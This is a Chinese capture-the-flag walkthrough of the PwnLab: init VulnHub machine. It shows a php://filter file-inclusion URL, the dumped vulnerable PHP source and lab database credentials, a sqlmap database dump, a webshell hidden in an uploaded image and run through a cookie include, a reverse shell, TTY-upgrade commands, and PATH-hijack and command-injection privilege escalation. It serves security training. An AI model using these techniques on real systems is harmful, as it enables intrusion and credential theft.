11 PwnLab init 靶机

作者: 沉云

简介

靶机地址 https://www.vulnhub.com/entry/pwnlab-init,158/

信息收集

image-20210610145359159

web 渗透

image-20210610145425108

扫目录

image-20210610145529847

登录处sql 注入

image-20210610145452045

sqlmap 跑失败了

检测数据包中敏感字段

image-20210610145612185

尝试未授权直接访问 upload.php ,失败

尝试 page 处文件包含,发现可以读取文件

page 参数文件包含

根据扫目录扫描出来的文件名与page 包含的参数,很容易猜测出 page 参数末尾自动添加 .php 后缀。

尝试 00 截断、长度截断、? 特殊 url 字符截断。都失败了。但不能就说这块不存在包含漏洞。

可以尝试使用 url-wrapper 读取一些数据

php://filter/convert.base64-encode/resource=index
http://192.168.200.151/?page=php%3a%2f%2ffilter%2fconvert.base64-encode%2fresource%3dindex

读取一下扫到的部分关键文件,并解码

 index.php
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
    include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
    if (isset($_GET['page']))
    {
        include($_GET['page'].".php");
    }
    else
    {
        echo "Use this server to upload and share image files inside the intranet";
    }
?>
</center>
</body>
</html>


 config.php
<?php
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

 upload.php
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
    <body>
        <form action='' method='post' enctype='multipart/form-data'>
            <input type='file' name='file' id='file' />
            <input type='submit' name='submit' value='Upload'/>
        </form>
    </body>
</html>
<?php 
if(isset($_POST['submit'])) {
    if ($_FILES['file']['error'] <= 0) {
        $filename  = $_FILES['file']['name'];
        $filetype  = $_FILES['file']['type'];
        $uploaddir = 'upload/';
        $file_ext  = strrchr($filename, '.');
        $imageinfo = getimagesize($_FILES['file']['tmp_name']);
        $whitelist = array(".jpg",".jpeg",".gif",".png");

        if (!(in_array($file_ext, $whitelist))) {
            die('Not allowed extension, please upload images only.');
        }
        if(strpos($filetype,'image') === false) {
            die('Error 001');
        }
        if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
            die('Error 002');
        }
        if(substr_count($filetype, '/')>1){
            die('Error 003');
        }

        $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
        if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
            echo "<img src=\"".$uploadfile."\"><br />";
            die('Error 4');
        }
    }
}
?>

看来基本意图比较明确,通过 直连数据库获取到用户信息,登录进网站。然后通过上传功能上传 webshell 。最后再通过 cookie 中 lang 变量包含 webshell。

python3 sqlmap.py  -d mysql://root:H4u%QJ_H99@192.168.200.151:3306/ -D Users --dump

+------------------+--------+
| pass             | user   |
    +------------------+--------+
    | aVN2NVltMkdSbw== | kane   |  iSv5Ym2GRo
    | Sld6WHVCSkpOeQ== | kent   |  JWzXuBJJNy
    | U0lmZHNURW42SQ== | mike   |  SIfdsTEn6I
    +------------------+--------+

将 webshell 附加到图片里,上传。再通过 cookie 中包含即可执行命令。

![image-20210610182607393](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192909299-1977291421.png)

![image-20210610182627868](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192912276-676978966.png)

本地使用 nc 监听,然后反弹 shell

![image-20210610191844817](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192914022-205796473.png)

 提权 

通过反弹 shell 之后,通过以下命令获取 full tty shell

    python -c 'import pty;pty.spawn("/bin/bash")'
    export TERM=xterm
    [ctrl + z]
    stty raw -echo; fg
    stty rows 38 columns 116

先看配置 是否存在问题,再尝试漏洞提权

发现 /home 下存在 4个用户,有三个的密码已经得到,逐个登录,看是否有敏感文件

![image-20210610184549354](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192916794-444969448.png)

 kane 用户 

![image-20210610184627125](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192918373-131157985.png)

![image-20210610184738064](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192925194-1040866567.png)

尝试库劫持,但目标主机没有 strace 这个命令

    strace msgmike 2>&1 | grep -i -E "(open|access)*no file"

没思路了,看下 writeup ,提示可以通过修改 PATH ,从而劫持 cat。

![image-20210610185811067](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192928635-659584999.png)

![image-20210610190840409](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192931044-95307890.png)

从而获取到 mike 用户的 shell

 kent 用户 

没有值得注意的文件

![image-20210610185016857](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192932789-1968865353.png)

 mike 用户 

密码不对,登录失败。

通过 kane 用户家目录下 msgmike 获取到 shell 后

![image-20210610190940003](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192939983-1294083968.png)

运行一下,是让输入某些东西。尝试 strings 看看有没有敏感的内容。发现以下内容

![image-20210610191034415](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192935318-1401618322.png)

此处意味着输入很可能会被替换为 %s 。那么就是典型的命令注入绕过。

![image-20210610191420206](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192936955-826353109.png)

![image-20210610191529986](https://static.oomspot.com/image/cnbo/2020/1512048-20210610192941127-122934366.png)

![image-20210610191548409](https://img2020.cnblogs.com/blog/1512048/202106/1512048-20210610192944966-663854932.png)  
> 原文创作:沉云
>
> 原文链接:https://www.cnblogs.com/starrys/p/14872491.html

更多推荐

更多
这里什么都没有

近期文章

更多
文章目录

    推荐作者

    更多